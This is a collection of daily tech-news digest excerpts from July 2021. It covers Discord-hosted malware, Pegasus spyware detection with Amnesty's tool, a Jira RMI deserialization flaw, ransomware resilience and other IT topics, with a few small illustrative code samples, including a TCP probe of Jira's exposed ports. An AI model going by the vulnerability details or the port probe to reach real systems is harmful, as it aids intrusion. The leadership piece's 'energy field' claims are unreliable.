Daily Tech Digest - July 25, 2021

Discord CDN and API Abuses Drive Wave of Malware Detections

Discord’s CDN is being abused to host malware, while its API is being leveraged to exfiltrate stolen data and facilitate hacker command-and-control channels, Sophos added. Because Discord is heavily trafficked by younger gamers playing Fortnite, Minecraft and Roblox, a lot of the malware floating around amounts to little more than pranking, such as the use of code to crash an opponent’s game, Sophos explained. But the spike in info stealers and remote access trojans is more alarming, it added. “But the greatest percentage of the malware we found have a focus on credential and personal information theft, a wide variety of stealer malware as well as more versatile RATs,” the report said. “The threat actors behind these operations employed social engineering to spread credential-stealing malware, then use the victims’ harvested Discord credentials to target additional Discord users.” The team also found outdated malware including spyware and fake app info stealers being hosted on the Discord CDN.


The sixth sense of a successful leader

The Sixth Sense endowed Leader has to possess a highly developed awareness of what needs to be done, how it needs to be done, and when it needs to be done, simultaneously anticipating the needs of the human resource involved in the task, and continuously visualising the anticipated outcome. For successful employment of sixth sense the Leader needs to work on the Higher Intellect plane. This does not preclude the Leader from seeking material gains, for that is the ultimate aim of any business. However, the Leader needs to weigh the anticipated gains against likely social and environmental degradation. Similarly, the Leader needs to be steeped in definable values and ethics, which in turn act as the Sixth Sense Pillar. This Pillar will be the fulcrum enabling the Leader to leverage gains beyond cognitive reasoning, and to attain the status of a Karma Yogi. The Sixth Sense Leader, a true Karma Yogi, empowers self to develop: – Vision to create rather than await opportunity, by tapping dimensional awareness of the future. – Analysing and risk-acceptance capability, through the capacity to subtly induce change in energy fields impacting the mission.

Why Data Management Needs An Aggregator Model

As enterprises shift to a hybrid multicloud architecture, they can no longer manage data within each storage silo, search for data within each storage silo and pay a heavy cost to move data from one silo to another. As GigaOm analyst Enrico Signoretti pointed out: "The trend is clear: The future of IT infrastructures is hybrid ... [and] it requires a different and modern approach to data management." Another key reason an aggregator model for data management is needed is that customers want to extract value from their data. To make unstructured data analyzable and searchable, vital information is stored in what is called "metadata" — information about the data itself. Metadata is like an electronic fingerprint of the data. For example, a photo on your phone might have information about the time and location when it was taken as well as who was in it. Metadata is very valuable, as it is used to search, find and index different types of unstructured data. And since storage business models are built on owning the data, storage vendors may move only some blocks to the cloud rather than all of the data.
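The role metadata plays here can be sketched with a toy index: search runs against the metadata, never the file contents. The file names and fields below are hypothetical examples, not a real product's schema.

```python
# Toy metadata index for unstructured files (photos), illustrating how
# metadata -- not file contents -- drives search across storage silos.
# File names and fields are hypothetical examples.

photos = [
    {"file": "IMG_001.jpg", "taken": "2021-07-04", "location": "Boston", "people": ["Ana"]},
    {"file": "IMG_002.jpg", "taken": "2021-07-04", "location": "Austin", "people": ["Ben", "Ana"]},
    {"file": "IMG_003.jpg", "taken": "2021-06-01", "location": "Boston", "people": []},
]

def search(index, **criteria):
    """Return files whose metadata matches every given criterion."""
    results = []
    for meta in index:
        if all(
            value in meta[key] if isinstance(meta[key], list) else meta[key] == value
            for key, value in criteria.items()
        ):
            results.append(meta["file"])
    return results

print(search(photos, location="Boston"))   # ['IMG_001.jpg', 'IMG_003.jpg']
print(search(photos, people="Ana"))        # ['IMG_001.jpg', 'IMG_002.jpg']
```

An aggregator model would build one such index spanning every silo, so a query does not need to know which system holds the bytes.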

Next-Gen Data Pipes With Spark, Kafka and k8s

In Lambda Architecture, there are two main layers – Batch and Speed. The first one transforms data in scheduled batches whereas the second is responsible for near real-time data processing. The batch layer is typically used when the source system sends the data in batches, access to the entire dataset is needed for required data processing, or the dataset is too large to be handled as a stream. On the contrary, stream processing is needed for small packets of high-velocity data, where the packets are either mutually independent or packets in close vicinity form a context. Naturally, both types of data processing are computation-intensive, though the memory requirement for batch is higher than the stream layer. Architects look for solution patterns that are elastic, fault-tolerant, performing, cost-effective, flexible, and, last but not least – distributed. ... Lambda architecture is complex because it has two separate components for handling batch and stream processing of data. The complexity can be reduced if one single technology component can serve both purposes.


Moving fast and breaking things cost us our privacy and security

Tokenized identification puts the power in the user’s hands. This is crucial not just for workplace access and identity, but for a host of other, even more important reasons. Tokenized digital IDs are encrypted and can only be used once, making it nearly impossible for anyone to view the data included in the digital ID should the system be breached. It’s like Signal, but for your digital IDs. As even more sophisticated technologies roll out, more personal data will be produced (and that means more data is vulnerable). It’s not just our driver’s licenses, credit cards or Social Security numbers we must worry about. Our biometrics and personal health-related data, like our medical records, are increasingly online and accessed for verification purposes. Encrypted digital IDs are incredibly important because of the prevalence of hacking and identity theft. Without tokenized digital IDs, we are all vulnerable. We saw what happened with the Colonial Pipeline ransomware attack recently. It crippled a large portion of the U.S. pipeline system for weeks, showing that critical parts of our infrastructure are extremely vulnerable to breaches.
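The single-use property of a tokenized credential can be illustrated with a short sketch: the verifier stores only a hash of a random token and consumes it on first use, so a replayed token is rejected. This is a toy under those assumptions, not a production identity scheme.

```python
# Sketch of a single-use ("tokenized") credential. The verifier keeps a hash
# of each issued token, never the token itself, and marks it consumed on
# first redemption so a replay fails. Illustrative only.
import hashlib
import secrets

class TokenVault:
    def __init__(self):
        self._unused = set()

    def issue(self):
        token = secrets.token_urlsafe(32)                 # random, unguessable
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._unused.add(digest)                          # store the hash only
        return token

    def redeem(self, token):
        digest = hashlib.sha256(token.encode()).hexdigest()
        if digest in self._unused:
            self._unused.remove(digest)                   # single use: consume it
            return True
        return False                                      # unknown or already used

vault = TokenVault()
t = vault.issue()
print(vault.redeem(t))   # True  (first use)
print(vault.redeem(t))   # False (replay rejected)
```

Because only hashes are stored, a breach of the vault reveals nothing usable, which is the property the article attributes to tokenized digital IDs.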


Agile at 20: The Failed Rebellion

In some ways, Agile was a grassroots labor movement. It certainly started with the practitioners on the ground and got pushed upwards into management. How did this ever succeed? It’s partially due to developers growing in number and value to their businesses, gaining clout. But the biggest factor, in my view, is that the traditional waterfall approach simply wasn’t working. As software got more complicated and the pace of business accelerated and the sophistication of users rose, trying to plan everything up front became impossible. Embracing iterative development was logical, if a bit scary for managers used to planning everything. I remember meetings in the mid-2000s where you could tell management wasn’t really buying it, but they were out of ideas. What the hell, let’s try this crazy idea the engineers keep talking about. We’re not hitting deadlines now. How much worse can it get? Then to their surprise, it started working, kind of, in fits and starts. Teams would thrash for a while and then slowly gain their legs, discovering what patterns worked for that individual team, picking up momentum.


Is Consciousness Bound by Quantum Physics? We're Getting Closer to Finding Out

We're not yet able to measure the behavior of quantum fractals in the brain – if they exist at all. But advanced technology means we can now measure quantum fractals in the lab. In recent research involving a scanning tunneling microscope (STM), my colleagues at Utrecht and I carefully arranged electrons in a fractal pattern, creating a quantum fractal. When we then measured the wave function of the electrons, which describes their quantum state, we found that they too lived at the fractal dimension dictated by the physical pattern we'd made. In this case, the pattern we used on the quantum scale was the Sierpiński triangle, which is a shape that's somewhere between one-dimensional and two-dimensional. This was an exciting finding, but STM techniques cannot probe how quantum particles move – which would tell us more about how quantum processes might occur in the brain. So in our latest research, my colleagues at Shanghai Jiaotong University and I went one step further. Using state-of-the-art photonics experiments, we were able to reveal the quantum motion that takes place within fractals in unprecedented detail.


How Deepfakes Are Powering a New Type of Cyber Crime

Cybercriminals are always quick to leap onto any bandwagon that they can use to improve or modernize their attacks. Audio fakes are becoming so good that it requires a spectrum analyzer to definitively identify fakes, and AI systems have been developed to identify deepfake videos. If manipulating images lets you weaponize them, imagine what you can do with sound and video fakes that are good enough to fool most people. Crimes involving faked images and audio have already happened. Experts predict that the next wave of deepfake cybercrime will involve video. The working-from-home, video-call-laden “new normal” might well have ushered in the new era of deepfake cybercrime. An old phishing email attack involves sending an email to the victim, claiming you have a video of them in a compromising or embarrassing position. Unless payment is received in Bitcoin the footage will be sent to their friends and colleagues. Scared there might be such a video, some people pay the ransom.


5 Steps to Improving Ransomware Resiliency

Enterprises need robust endpoint data protection and system security. This includes antivirus software and even whitelisting software, where only approved applications can run. Enterprises need both an active element of protection and a reactive element of recovery. Companies hit with a ransomware attack can spend five days or longer recovering, so it’s imperative that companies actively implement the right backup and recovery strategies before a ransomware attack. Black hats who develop ransomware are trying to cut off every avenue that would let an enterprise avoid paying the ransom. ... We urge organizations to implement a more comprehensive backup and recovery approach based on the National Institute of Standards and Technology (NIST) Cybersecurity Framework. It includes a set of best practices: Using immutable storage, which prevents ransomware from encrypting or deleting backups; implementing in-transit and at-rest encryption to prevent bad actors from compromising the network or stealing your data; and hardening the environment by enabling firewalls that restrict ports and processes.


This Week in Programming: Kubernetes from Day One?

“To move to Kubernetes, an organization needs a full engineering team just to keep the Kubernetes clusters running, and that’s assuming a managed Kubernetes service and that they can rely on additional infrastructure engineers to maintain other supporting services on top of, well, the organization’s actual product or service,” they write. While this is part of StackOverflow’s reasoning — “The effort to set up Kubernetes is less than you think. Certainly, it’s less than the effort it would take to refactor your app later on to support containerization.” — Ably argues that “it seems that introducing such an enormously expensive component would merely move some of our problems around instead of actually solving them.” Meanwhile, another blog post this week argues that Kubernetes is our generation’s Multics, again centering on this idea of complexity. Essentially, the argument here is that Kubernetes is “a serious, respectable, but overly complex system that will eventually be replaced by something simpler: the Unix of distributed operating systems.” Well then, back to Unix it is!



Quote for the day:

"Leaders must encourage their organizations to dance to forms of music yet to be heard." -- Warren G. Bennis

Daily Tech Digest - July 24, 2021

Quantum entanglement-as-a-service: "The key technology" for unbreakable networks

Like classical networks, quantum networks require hardware-independent control plane software to manage data exchange between layers, allocate resources and control synchronization, the company said. "We want to be the Switzerland of quantum networking," said Jim Ricotta, Aliro CEO. Networked quantum computers are needed to run quantum applications such as physics-based secure communications and distributed quantum computing. "A unified control plane is one of several foundational technologies that Aliro is focused on as the first networking company of the quantum era," Ricotta said. "Receiving Air Force contracts to advance this core technology validates our approach and helps accelerate the time to market for this and other technologies needed to realize the potential of quantum communication." Entanglement is a physical phenomenon that involves tiny things such as individual photons or electrons, Ricotta said. When they are entangled, "then they become highly correlated" and appear together. It doesn't matter if they are hundreds of miles apart, he said.


Design for Your Strengths

Strengths and weaknesses are often mirrors of each other. My aerobic weakness had, as its inverse, a superstrength of anaerobic power. Indeed, these two attributes often go hand in hand. Finally, I had figured out how to put this to use. After the Lillehammer Olympics, I dropped out of the training camp. But I was more dedicated than ever to skating. I moved to Milwaukee, and without the financial or logistical support of the Olympic Committee, began a regimen of work, business school, and self-guided athletic training. I woke up every day at 6 a.m. and went to the rink. There I put on my pads and blocks and skated from 7 until 9:30. Then I changed into a suit for my part-time job as an engineer. At 3 p.m., I left work in Milwaukee and drove to the Kellogg Business School at Northwestern, a two-hour drive. I had class from 6 to 9 p.m., usually arrived home at 11, and lifted weights until midnight. I did that every day for two and a half years. Many people assume that being an Olympic athlete requires a lot of discipline. But in my experience, the discipline is only physical. 


‘Next Normal’ Approaching: Advice From Three Business Leaders On Navigating The Road Ahead

With some analysts predicting a "turnover tsunami" on the horizon, talent strategy has taken on a new sense of urgency. Lindsey Slaby, Founding Principal of marketing strategy consultancy Sunday Dinner, focuses on building stronger marketing organizations. She shares: Organizations are accelerating growth by attracting new talent muscle and re-skilling their existing teams. A rigorous approach to talent has never been as important as it is right now. The relationship between employer and employee has undergone significant recalibration over the last year, with the long-term impact of the nation’s largest work-from-home experiment yet to come into clear view. But much like the Before Times, perhaps the greatest indicator of how an organization will fare on the talent front comes down to how it invests in its people and specifically their future potential. Slaby believes there is a core ingredient to any winning talent strategy: Successful organizations prioritize learning and development. Training to anticipate the pace of change is essential. It is imperative that marketers practice ‘strategy by doing’ and understand the underlying technology that fuels their go-to-market approach.


The Beauty of Edge Computing

The volume and velocity of data generated at the edge is a primary factor that will impact how developers allocate resources at the edge and in the cloud. “A major impact I see is how enterprises will manage their cloud storage because it’s impractical to save the large amounts of data that the Edge creates directly to the cloud,” says Will Kelly, technical marketing manager for a container security startup (@willkelly). “Edge computing is going to shake up cloud financial models so let’s hope enterprises have access to a cloud economist or solution architect who can tackle that challenge for them.” With billions of industrial and consumer IoT devices being deployed, managing the data is an essential consideration in any edge-to-cloud strategy. “Advanced consumer applications such as streaming multiplayer games, digital assistants and autonomous vehicle networks demand low latency data so it is important to consider the tremendous efficiencies achieved by keeping data physically close to where it is consumed,” says Scott Schober, President/CEO of Berkeley Varitronics Systems, Inc. (@ScottBVS).


Facebook Makes a Big Leap to MySQL 8

The company skipped entirely upgrading to MySQL 5.7, the major release between 5.6 and 8.0. At the time, Facebook was building its custom storage engine, called MyRocks, for MySQL and didn’t want to interrupt the implementation process, the engineers write. MyRocks is a MySQL adaptation of RocksDB, a storage engine optimized for fast write performance that Instagram built on to optimize Cassandra. Facebook itself was using MyRocks to power its “user database service tier,” but would require some features in MySQL 8.0 to fully support such optimizations. Skipping over version 5.7, however, complicated the upgrade process. “Skipping a major version like 5.7 introduced problems, which our migration needed to solve,” the engineers admitted in the blog post. Servers could not simply be upgraded in place. They had to use a logical dump to capture the data and rebuild the database servers from scratch — work that took several days in some instances. API changes from 5.6 to 8.0 also had to be rooted out, and supporting two major versions within a single replica set is just plain tricky.


Research shows AI is often biased. Here's how to make algorithms work for all of us

Inclusive design emphasizes inclusion in the design process. The AI product should be designed with consideration for diverse groups such as gender, race, class, and culture. Foreseeability is about predicting the impact the AI system will have right now and over time. Recent research published by the Journal of the American Medical Association (JAMA) reviewed more than 70 academic publications based on the diagnostic prowess of doctors against digital doppelgangers across several areas of clinical medicine. A lot of the data used in training the algorithms came from only three states: Massachusetts, California and New York. Will the algorithm generalize well to a wider population? A lot of researchers are worried about algorithms for skin-cancer detection. Most of them do not perform well in detecting skin cancer for darker skin because they were trained primarily on light-skinned individuals. The developers of the skin-cancer detection model didn't apply principles of inclusive design in the development of their models.


Leverage the Cloud to Help Consolidate On-Prem Systems

The recommended approach is to "create or recreate" a representation of the final target system in-the-cloud, but not re-engineer any components into cloud-native equivalents. The same number of LPARs, same memory/disk/CPU allocations, same file system structures, same exact IP addresses, same exact hostnames, and same network subnets are created in the cloud to represent, as much as possible, a "clone" of the eventual system of record that will exist on-prem. The benefit of this approach is that you can apply "cloud flexibility" to what was historically a "cloud stubborn" system. Fast cloning, ephemeral longevity, software-defined networking, and API automation can all be applied to the temporary stand-in running in the cloud. As design principles are finalized based on research performed on the cloud version of the system, those findings can be applied to the on-prem final buildout. To jump-start the cloud build-out process, it is possible to reuse existing on-prem assets as the foundation for components built in the cloud. LPARs in the cloud can be based on existing mksysb images already created on-prem.


Scaling API management for long-term growth

To manage the complexity of the API ecosystem, organisations are embracing API management tools to identify, control, secure and monitor API use in their existing applications and services. Having visibility and control of API consumption provides a solid foundation for expanding API provision, discovery, adoption and monetisation. Many organizations start with an in-house developed API management approach. However, as their API management strategies mature, they often find the increasing complexity of maintaining and monitoring the usage of APIs, and the components of their API management solution itself, a drain on technical resources and a source of technical debt. A common challenge for API management approaches is becoming a victim of one’s own success. For instance, a company that deploys an API management solution for a region or department may quickly get requests for access from other teams seeking to benefit from the value delivered, such as API discoverability and higher service reliability. While this demand should be seen as proof of a great approach to digitalization, it adds challenges and raises questions for example around capacity, access control, administration rights and governance.


Is Blockchain the Ultimate Cybersecurity Solution for My Applications?

Blockchain can provide a strong and effective solution for securing networked ledgers. However, it does not guarantee the security of individual participants or eliminate the need to follow other cybersecurity best practices. A blockchain application may depend on external data or other at-risk resources; thus, it cannot be a panacea. The blockchain implementation code and the environments in which the blockchain technology runs must be checked for cyber vulnerabilities. Blockchain technology provides stronger transactional security than traditional, centralized computing services for a secured networked transaction ledger. For example, say I use distributed ledger technology (DLT), an intrinsic blockchain feature, while creating my blockchain-based application. DLT increases cyber resiliency because it creates a situation where there is no single point of failure. In the DLT, an attack on one or a small number of participants does not affect other nodes. Thus, DLT helps maintain transparency and availability, and continue the transactions. Another advantage of DLT is that endpoint vulnerabilities are addressed.
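The tamper evidence that underpins these ledger guarantees can be shown with a minimal hash chain: each block commits to the previous block's hash, so editing an early record breaks every later link. This is a sketch of the idea only, not a real DLT implementation (no consensus, no networking).

```python
# Minimal hash-chained ledger: each block stores the hash of its predecessor,
# so tampering with an early record invalidates every subsequent link.
import hashlib
import json

def block_hash(block):
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def append(chain, data):
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"data": data, "prev": prev})

def verify(chain):
    """Recompute each link; any mismatch means the history was altered."""
    for i in range(1, len(chain)):
        if chain[i]["prev"] != block_hash(chain[i - 1]):
            return False
    return True

chain = []
for tx in ["alice->bob:5", "bob->carol:2"]:
    append(chain, tx)
print(verify(chain))                   # True
chain[0]["data"] = "alice->bob:500"    # tamper with an early record
print(verify(chain))                   # False: later links no longer match
```

In a real DLT, many independent nodes each hold such a chain, which is why compromising one participant does not let an attacker rewrite the shared history.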


Why bigger isn’t always better in banking

Of course, there are outliers. One of them is Brown Brothers Harriman, a merchant/investment bank that traces its origins back some 200 years, and that is the subject of an engaging new book, Inside Money. Historian Zachary Karabell (disclosure: we were graduate school classmates in the last millennium) offers not just an intriguing family and personal history, but a lesson in how to balance risk and ambition against responsibility and longevity—and in why bigger isn’t always better. The firm’s survival is even more remarkable given that US financial history often reads as a string of booms, bubbles, busts, and bailouts. The Panic of 1837. The Panic of 1857. The Civil War. The Panic of 1907. The Great Depression. The Great Recession of 2008. In finance, leverage—i.e., debt—is the force that allows companies to lift more than they could under their own power. It’s also the force that can crush them when circumstances change. And Brown Brothers has thrived in part by avoiding excessive leverage. Today, the bank primarily “acts as a custodian for trillions of dollars of global assets,” Karabell writes. “Its culture revolves around service.”



Quote for the day:

"Leadership is absolutely about inspiring action, but it is also about guarding against mis-action." -- Simon Sinek

Daily Tech Digest - July 23, 2021

The CISO: the enabler of innovation

With digital transformation already in focus for many businesses, adding a now distributed workforce on top of this scenario ratchets up the security challenge. One in five CEOs and CISOs saw a major increase in all types of cyber attacks since COVID-19, with supply chain attacks topping the table side by side with ransomware. The key here is to enable and drive businesses, rather than impede them. By moving to support remote workers by adjusting policies and controls discreetly, businesses can enable teams to work better in their own role in their own job. This means allowing them to access data from anywhere while providing better visibility 24/7, enabling more proactive alerts and controls. In fact, 58% of CEOs and CISOs have recognised the need for a more integrated trust framework, with 48% also substantially increasing the use of cloud-based cyber security systems. In the future, the workforce will have even more autonomy within the decentralised cultures that develop as business leaders find new ways to drive collaboration and creativity. For the CISO, this means continuously adapting to an evolving workplace.


Why unstructured data is the future of data management

Today, data is a valuable corporate asset. You’ve got to be strategic with it because it’s not just for your BI teams, but for the R&D and customer success teams. They need historical data to build new products or to improve the ones they already have. This is super relevant in manufacturing, such as in the semiconductor chip industry, but also in other industries that are so important to our economy, such as pharmaceuticals. COVID researchers depended upon access to SARS data when developing vaccines and treatments. Data often becomes valuable again later, and what if you don’t know what you have or you can’t find it? We’ve had customers in the media and entertainment business, and in the past when they wanted to find an old show, they’d need access to a tape archive. Then, they needed an asset tag to locate the tape. That can be very difficult, and it’s why archiving is not popular. Live archive solutions that are available today make archived data instantly accessible and transparently tier data so users can easily locate files and access them anytime.


Here’s how to check your phone for Pegasus spyware using Amnesty’s tool

The first thing to note is the tool is command line or terminal based, so it will take either some amount of technical skill or a bit of patience to run. We try to cover a lot of what you need to know to get up and running here, but it’s something to know before jumping in. The second note is that the analysis Amnesty is running seems to work best for iOS devices. In its documentation, Amnesty says the analysis its tool can run on Android phone backups is limited, but the tool can still check for potentially malicious SMS messages and APKs. Again, we recommend following its instructions. ... If you’re using a Mac to run the check, you’ll first need to install both Xcode, which can be downloaded from the App Store, and Python3 before you can install and run mvt. The easiest way to obtain Python3 is using a program called Homebrew, which can be installed and run from the Terminal. After installing these, you’ll be ready to run through Amnesty’s iOS instructions. If you run into issues while trying to decrypt your backup, you’re not alone. The tool was giving me errors when I tried to point it to my backup, which was in the default folder. 
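For the macOS/iOS path described above, the sequence looks roughly like the following. The backup path, password placeholder, and indicators filename are examples; the `mvt-ios` flags reflect the MVT documentation at the time of writing and may change, so check Amnesty's instructions before running anything.

```shell
# Install prerequisites (Homebrew provides Python 3; Xcode comes from the App Store)
brew install python3
pip3 install mvt            # installs the mvt-ios and mvt-android tools

# Decrypt an encrypted local iTunes/Finder backup (paths are examples)
mvt-ios decrypt-backup -p <backup_password> -d ~/decrypted \
    ~/Library/Application\ Support/MobileSync/Backup/<device-udid>

# Check the decrypted backup against published Pegasus indicators of compromise
mvt-ios check-backup --iocs pegasus.stix2 --output ~/results ~/decrypted
```

The `check-backup` step writes its findings into the output directory; anything flagged there warrants following Amnesty's guidance rather than self-diagnosis.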


Critical Jira Flaw in Atlassian Could Lead to RCE

The vulnerability has to do with a missing authentication check in Jira’s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching, Java EE and lightweight containers that’s used for performance and which simplifies scalability. Atlassian said that the bug was introduced in version 6.3.0 of Jira Data Center, Jira Core Data Center, Jira Software Data Center and Jira Service Management Data Center (known as Jira Service Desk prior to 4.14). According to Atlassian’s security advisory, that list of products exposed an Ehcache remote method invocation (RMI) network service that attackers – who can connect to the service on port 40001 and potentially 40011 – could use to “execute arbitrary code of their choice in Jira” through deserialization, due to missing authentication. RMI is an API that acts as a mechanism to enable remote communication between programs written in Java. It allows an object residing in one Java virtual machine (JVM) to invoke an object running on another JVM; often, it involves one program on a server and one on a client.
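A first triage step for defenders is simply checking whether the RMI ports named in the advisory are reachable from untrusted networks. The sketch below is a plain TCP reachability probe, not an exploit or a vulnerability scanner, and the hostname is an invented example.

```python
# Reachability probe for the Ehcache RMI ports named in the advisory
# (40001, and potentially 40011). An open port is only a triage signal,
# not proof of vulnerability. The hostname below is an example.
import socket

def port_is_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port in (40001, 40011):
    state = "reachable" if port_is_open("jira.example.internal", port) else "closed/filtered"
    print(f"port {port}: {state}")
```

If either port answers from outside the cluster's own network, Atlassian's advisory recommends restricting access; RMI services were never meant to face untrusted clients.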


Improving Your Productivity With Dynamic Problems

First, a Huffman code tree is built. Let the original alphabet consist of n characters, the i-th of which occurs pi times in the input text. Initially, all symbols are considered active nodes of the future tree, the i-th node is marked with pi. At each step, we take two active vertices with the smallest labels, create a new vertex, labeling it with the sum of the labels of these vertices, and make it their parent. The new vertex becomes active, and its two children are removed from the list of active vertices. The process is repeated many times until only one active vertex remains, which is assumed to be the root of the tree. Note that the symbols of the alphabet are represented by the leaves of this tree. For each leaf (symbol), the length of its Huffman code is equal to the length of the path from the root of the tree to it. The code itself is constructed as follows: for each internal vertex of the tree, consider two arcs going from it to the children. We assign the label 0 to one of the arcs, and to the other 1. The code of each symbol is a sequence of zeros and ones on the path from the root to the leaf.
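The construction above maps directly onto a min-heap of active nodes. The sketch below follows those steps: repeatedly merge the two smallest-labeled active vertices under a new parent, then read each symbol's code off the root-to-leaf path, labeling one arc 0 and the other 1.

```python
# Huffman tree construction as described: merge the two active nodes with
# the smallest counts until one root remains, then derive codes from the
# root-to-leaf paths.
import heapq
from collections import Counter

def huffman_codes(text):
    counts = Counter(text)
    if len(counts) == 1:                       # degenerate single-symbol alphabet
        return {next(iter(counts)): "0"}
    # Heap entries: (count, tiebreaker, tree). A tree is a leaf symbol
    # or a (left, right) pair; the tiebreaker avoids comparing trees.
    heap = [(p, i, sym) for i, (sym, p) in enumerate(counts.items())]
    heapq.heapify(heap)
    i = len(heap)
    while len(heap) > 1:
        p1, _, left = heapq.heappop(heap)      # two smallest labels...
        p2, _, right = heapq.heappop(heap)
        heapq.heappush(heap, (p1 + p2, i, (left, right)))   # ...get a new parent
        i += 1
    codes = {}
    def walk(node, prefix):
        if isinstance(node, tuple):
            walk(node[0], prefix + "0")        # label one arc 0...
            walk(node[1], prefix + "1")        # ...and the other 1
        else:
            codes[node] = prefix               # leaf: code = root-to-leaf path
    walk(heap[0][2], "")
    return codes

codes = huffman_codes("aaaabbc")
# The most frequent symbol gets the shortest code:
assert len(codes["a"]) < len(codes["b"]) and len(codes["a"]) < len(codes["c"])
print(codes)
```

Because every symbol sits at a leaf, no code is a prefix of another, which is what makes the encoded stream decodable without separators.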


Top 5 NCSC Cloud Security Principles for Compliance

Modern business IT infrastructures are complex, and data regularly moves between different environments across the network. It’s critical to protect sensitive data belonging to your customers and employees as it traverses between business applications/devices and the cloud. It’s also imperative that your cloud vendor protects data in transit inside the cloud, such as when data is replicated to a different region to ensure high availability. ... Different regulations have different requirements about where protected data can be stored. For example, some regulations stipulate that data can only be transferred to companies with sufficient levels of protection in processing personal data. If your business opts for a cloud provider that doesn’t provide transparency over the location of data, you could end up unknowingly in breach of regulations. ... The last thing your business wants is to use a public cloud service only to find that a malicious hacker accessed your sensitive data by compromising another customer first. This type of concerning non-compliance scenario can happen when there is insufficient separation between different customers of a cloud service.


Data and Analytics Salaries Heat Up in Recovery Economy

There are a few reasons why the market is really strong for data scientist and analytics pros right now. First, we are coming off a period of stagnation where no one wanted to change jobs and salaries stayed the same. That means those individuals who were considering a job change most likely put those plans on hold during the pandemic. Now all those people are getting back into the market. Second, there are so many new remote job opportunities, which opens up a whole new realm of job possibilities for data science and analytics pros. Third, as people move on to new jobs, they create vacancies where they were, opening up additional job vacancies. Fourth, there are some industries that had to change their business models to continue to operate during the pandemic economy. Burtch Works specifically points to retail, which had to enable digital channels to replace sales lost in brick-and-mortar stores. The Burtch Works report notes that many retailers have been expanding their data science and analytics teams and offering higher compensation than Burtch Works has typically seen in retail.


Home-office networks demand better monitoring tools

Networking professionals said they are enhancing their network operations toolsets in three primary ways. First, 54.2% are looking for tools that deliver security-related insights into home-office environments. This will help them collaborate with security teams to ensure that their increasingly distributed networks are compliant with policies. It will also help them discern whether a user-experience issue is related to a security problem. Second, 52.6% need new dashboard and reporting features that allow them to focus on home offices and remote workers, which will help admins and engineers spot problems and troubleshoot them more efficiently. If their existing tools lack adequate dashboard and reporting customization, they’ll have to look elsewhere for this view into their networks. Third, 49.4% need to upgrade the scalability of their tools. ... Network teams will need to integrate their tools with other systems to improve their ability to support home workers. For instance, 43% said home-office monitoring requirements are producing a need for their monitoring tools to integrate with their SD-WAN or secure access service edge (SASE) solution.


Hybrid work: 7 ways to enable asynchronous collaboration

One of the main differences between asynchronous and synchronous work is that the former tends to center on time- or task-defined work processes. “Asynchronous work requires a grasp of what the outcome – the final product of work – needs to be, as opposed to the amount of time spent in close coordination producing the final product,” says Dee Anthony, director at global technology research and advisory firm ISG. IT leaders need to get better at defining, managing, and measuring outcomes. Anthony suggests taking a page out of the agile playbook: Identify outcomes, estimate the effort required to accomplish them, track work velocity, and perform regular reviews. You must also foster a culture of trust. “Having people work across time, even in the same country, means that the old nine-to-five is out the window,” says Iain Fisher, director at ISG. “Managers cannot be there all the time, so a culture change of trust and respect must evolve.” ... “Working asynchronously requires very strong written communication skills to avoid ambiguity and misunderstanding,” says Lars Hyland.


Outcome Mapping - How to Collaborate With Clarity

The Outcome Map is an excellent way to create energetic communication, clarity, and alignment from the start (or re-start) of any initiative. It also reminds you to stay on track as you progress, and helps you recognize when you’re drifting from the path. By adding measurements and methods, you can describe where you want to go and how you plan to get there. In both a project and a product approach, clarity of outcomes is critical, but what’s often forgotten are the factors affecting the odds of achieving the outcome. Outcome mapping allows us to explore, anticipate, and design mitigation approaches for factors impacting our desired outcome. For this reason, it’s also commonly referred to as impact mapping. In practice, you can map many factors involved in a given outcome, but a few critical ingredients should always be present. Defining measures (or indicators) of progress (summarized as ‘Measures’ in the map itself) allows you to measure and celebrate progress without waiting until the distant deadline of your primary outcome to find out if you’ve succeeded or failed.



Quote for the day:

"It is the responsibility of leadership to provide opportunity, and the responsibility of individuals to contribute." -- William Pollard

Daily Tech Digest - July 22, 2021

How SMEs in e-commerce can drive value from machine learning

It’s important to realise that implementing machine learning in processes like customer segmentation means digging deeper into data than ever before, and ensuring the algorithms your business uses are underpinned by a thorough understanding of this data. Simply taking superficially similar customers and grouping them together when recommending products won’t go far enough for it to work successfully. The next step is to ensure the business is compatible with machine learning in the long run. For example, business problems where machine learning could be useful should be identified early on, and companies should get into the habit of preparing their data so that machine learning can be integrated without too much difficulty and disruption. Crucially, organisations should also identify relevant machine learning experts who can drive such projects forward, either internally or through outsourcing via external consultants. Finally, one of the most pressing concerns in the minds of many business leaders reluctant to implement machine learning is the threat the technology could pose to human staff.
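To make the point concrete, customer segmentation is usually approached as a clustering problem over behavioural features such as spend and purchase frequency. The sketch below is a minimal, illustrative k-means implementation over invented customer data; a production system would use a tested library (e.g. scikit-learn) and far richer, carefully prepared features, which is exactly the "digging deeper into data" the article describes.

```python
import random

def kmeans(points, k, iters=20, seed=42):
    """Minimal k-means: returns a cluster label for each point."""
    rnd = random.Random(seed)
    centers = rnd.sample(points, k)
    labels = [0] * len(points)
    for _ in range(iters):
        # Assign each point to its nearest center (squared Euclidean distance).
        for i, p in enumerate(points):
            labels[i] = min(range(k),
                            key=lambda c: sum((a - b) ** 2 for a, b in zip(p, centers[c])))
        # Recompute each center as the mean of its assigned points.
        for c in range(k):
            members = [p for p, lab in zip(points, labels) if lab == c]
            if members:
                centers[c] = tuple(sum(dim) / len(members) for dim in zip(*members))
    return labels

# Hypothetical customers described by (annual spend, orders per year).
customers = [(100, 2), (120, 3), (110, 2), (900, 30), (950, 28), (880, 32)]
labels = kmeans(customers, k=2)
print(labels)
```

With behaviour this well separated, the low- and high-spend customers land in different clusters; in practice the hard work is choosing and preparing the features, not running the algorithm.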


Are you ready for the newest era of DevSecOps?

